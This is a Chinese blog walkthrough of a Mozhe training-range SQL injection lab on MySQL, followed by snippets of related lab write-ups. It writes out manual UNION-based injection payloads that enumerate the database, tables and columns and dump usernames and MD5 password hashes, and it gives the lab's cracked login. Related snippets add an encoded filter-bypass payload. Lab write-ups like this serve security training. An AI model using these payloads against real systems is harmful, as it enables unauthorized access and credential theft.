在线靶场-墨者-SQL注入1星-SQL手工注入漏洞测试(MySQL数据库)

最新推荐文章于 2025-07-09 20:48:44 发布
最新推荐文章于 2025-07-09 20:48:44 发布
阅读量2.6k 收藏 5
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 在线靶场-墨者题目 文章标签: 墨者学院-靶场题目
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42079912/article/details/96464218
通过URL输入`and 1=1`与`and 1=2`判断出存在SQL注入漏洞。进一步利用`order by`确定字段数,结合`union select`获取数据库版本、数据库名、表名和字段信息。最终通过`group_concat`函数爆破StormGroup_member表中的用户名和经过MD5加密的密码。解密后发现用户名mozhe和密码248680是有效凭据,成功登录并获得key。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

尝试在URL后,输入and 1=1显示正常,and 1=2显示不正常,判断此处存在SQL注入
在这里插入图片描述
在这里插入图片描述

order by 获取字段数为4

and 1=2 union select 1,2,3,4 发现2在原文Title处,3在content处

and 1=2 union select 1,version(),database(),4 爆库得到

and 1=2 union select 1,version(),(select group_concat(table_name)from information_schema.tables where table_schema=database()),4爆表得到

and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=‘StormGroup_member’ 爆字段

and 1=2 union select 1,group_concat(name,0x5f,password,0x5f, status),3,4 from StormGroup_member 爆用户名密码
爆出的用户名密码有两个,先进行MD5解码的到密码,把两个都试了一遍,发现第二个才是正确的。
mozhe_96e2c5f641904870aff665c27d7bdcb1_1解密后得到密码:248680。

最低0.47元/天 解锁文章

200万优质内容无限畅学
靶场——SQL注入
newqian的博客
08-06 1986
接下来不多搞了,总结一下,get和post区别不大,都是看反馈选择对应的注入方式,不过一个主要靠地址栏,一个看from菜单输入,根据不同需求选择注入方式,联合查询就是一起查,全部一起显示,不过要注意长度限制,和表名列名获取等等。利用文件导入的方式进行注入,不过条件苛刻,首先要有root权限,接着需要知道网站路径,最后还需要一个为空,就真的是空的,不是null,由于条件过于苛刻,因此很少见(其原理就是利用其先上传再删除的机制,可以与程序抢进程,使其上传到上级目录,这样即使原目录的文件删除也没用)
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_46694260的博客
03-27 4112
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入是字符型的SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
墨者学院SQL手工注入在线靶场SQLsever;
xiaochenhang的博客
08-21 1407
object ():数据库中每个对象都有一个唯一的id值,object_id(name)可以根据表对象名称得到表对象的ID,object_id()只能返回用户创建的对像的ID,像以sys开头的表都是系统表所以返回不了的。sa权限:数据库操作,⽂件管理,命令执⾏,注册表读取等system:SQLServer数据库的最 ⾼权限。syscolumns:记录了数据库中所有表的字段,常⽤字段为id、name和xtype。id为标识,name为对应的表名和字段名,xtype为所对应的对象类型。
SQL注入sqli-labs靶场1-20关)
最新发布
2301_77171859的博客
07-09 322
从结果可以看出name是第2列,password是第3列,然后可以从第2列查看数据库的名称。可以看出数据库有3列,然后我们需要知道name和password显示的是第几列。可以看见表名显示出来了,之后在查询表里的字段名,以email为例。第二关与第一关的步骤大差不差,第二关是数字型注入,不需要单引号。通过上面的步骤可以知道第三关的闭合为'),其余步骤与第二关一样。使用报错注入后可以看见库名显示出来了,之后开始查询表名。可以看到报错,说明是字符型,接下来看看数据库有多少列。知道表名后可以来查询表的所有列名。
墨者学院在线靶场--WEB安全--SQL注入
m0_59022585的博客
07-09 1841
测试注入禁用password,注入-1+%75nion+%73elect+1,%64atabase(),(%73elect+group_concat(%70%61%73%73%77%6f%72%64)+%66rom+%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72),4回显得到三个MD5加密的密码。
sql注入靶场实操
weixin_45711977的博客
06-23 3847
sql注入靶场实操
sql注入靶场练习
weixin_46976845的博客
03-19 6177
pass.1 发现id注入点,尝试联合注入 id=1’ union select 1,database().3 --+或者 id=1’ union select 1,database().3#’ 返回 Welcome Dhakkan Your Login name:Dumb Your Password:Dumb 跑sqlmap 得知数据库账户密码都为root pass.2 注入1相同 pass.3 括号闭合 注意 ?id=1) union select 1,database().3 --+ pa
墨者学院 SQL手工注入漏洞测试(MySQL数据库)
qq_48368964的博客
07-22 499
id=1 order by 5 回显异常,说明有四列字段。id=1 order by 1 回显正常。由于为root用户,所以可以高权限访问其他的数据库信息,可跨库查询信息,同一个服务器下的不同站点中的数据库均可查看。接下来进行信息收集,收集数据库的信息:操作系统,数据库名,数据库的用户,数据库的版本等。直接在可控变量后面随便输入值,看回显效果,回显不正常,可能存在SQL注入。观察url信息,为GET请求,存在可控变量,验证是否存在SQL注入1 and 1=2 回显不正常,可能存在SQL注入
墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符型)
Lollipop_zhi的博客
02-26 2389
1.启动靶场环境,老地方点击 2.看地址栏,合理怀疑是否有注入点 这里插入知识点——怎么判断有注入点? 一般方法: and 1=1 正常 and 1=2 错误 背后的原理是逻辑运算 真且真=真;真且假=假 所以只需要让它能判断出假,就可以合理怀疑存在注入点 比如:id=jhfjkashlk(瞎打的) 改成 id=jhdak 显示异常,有注入点 3.尝试简单使用order by 猜解列名数量,不成功 order by 之后我才判断了单引号闭合,也就是id=tingjigon
墨者靶场SQL手工注入漏洞测试(MySQL数据库)
weixin_46694260的博客
03-23 7414
0x00 前言 学SQL注入也有一段时间了,找了一个在线靶场,这个题目基本上学会最基本的注入原理和方法都能拿下,废话就不多说了,直接来演示吧~菜鸟渗透,大佬勿喷 0x01 过程 首先我们先稍微看一下题目 通过题目我们可以看出靶场环境是Nginx+PHP+MySQL 那我们现在启动、进入靶场 ...
SQL注入--靶场练习
wmr123456001的博客
02-11 2288
SQL注入靶场练习
sql注入靶场实操
m0_46104808的博客
10-27 1749
sql注入漏洞利用
SQL注入测试平台 SQLol -2.SELECT注入测试
05-23 386
前面,我们已经安装好了SQLol,打开http://localhost/sql/,首先跳转到http://localhost/sql/select.php,我们先从select模块进行测试。 一条完成Select语句,大致可以这样表示: SELECT 【username】 FROM 【users】 WHERE username = 【'1'】 GROUP BY 【u...
渗透测试---手把手教你SQL注入(11)---SQL注入拓展总结(SQLsever在线靶场实战)
weixin_52796034的博客
10-19 502
在当今的网络环境中,网络安全问题越来越受到重视。其中,SQL注入是一种常见的攻击手段,对于数据库安全具有极大的威胁。为了帮助大家更好地了解和学习如何防范SQL注入攻击,本文是一篇关于MSSQL数据库SQL注入在线靶场攻略的文章。 总之,本文提供的MSSQL数据库SQL注入在线靶场攻略详尽实用,适合网络安全初学者和从业者深入学习。通过理解和学习这篇文章,我们能够更好地认识SQL注入攻击的原理和危害,提高数据库的安全防范意识和技能。
sql注入靶场
weixin_45095113的博客
11-27 730
SQL注入靶场
SQL注入靶场攻击——sqli-labs
qq_67812668的博客
08-14 1427
概述SQL注入SQL Injection)是发生在web程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至修改数据库,也就是说,SQL注入就是在爱用户输入的字符串中添加SQL语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的SQL语句就会被数据库服务器误认为是正常的SQL语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。
在线靶场
weixin_43977912的博客
05-06 288
在线靶场 DVMA: http://43.247.91.228:81/ XSS: http://59.63.200.79:8004/Feedback.asp 其他安全问题,可以关注我公众号咨询我
SQL 靶场
weixin_45971758的博客
05-19 800
学习文章。
墨者学院在线靶场SQL手工注入漏洞测试(MySQL数据库)
qq_47271638的博客
05-07 772
墨者学院在线靶场SQL手工注入漏洞测试(MySQL数据库) 打开环境 点击箭头指向链接 观察网页的URL发现有id=1,可能存在SQL注入点。 首先对URL进行尝试猜列名数量(字段数),在URL后面添加order by 1或者2 直到出现页面不在显示正常页面,这就说明存在的字段数应该是现在所输入的数字减1。 此处order by 4页面显示正常而order by 5出现页面不正常显示说明只存在4个字段(注此方法只适用于字段数不是很多的时候)。 然后查看哪个字段能显示出来 在URL后面联合查询 un
墨者学院SQL手工注入漏洞测试(MySQL数据库)
12-29
### MySQL数据库中的SQL手工注入漏洞测试方法 #### 测试前准备 为了安全有效地进行SQL注入测试,建议在一个受控环境中操作。通常会搭建一个包含Nginx、PHP以及MySQL靶场环境,在此环境下可以自由尝试各种攻击向量...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值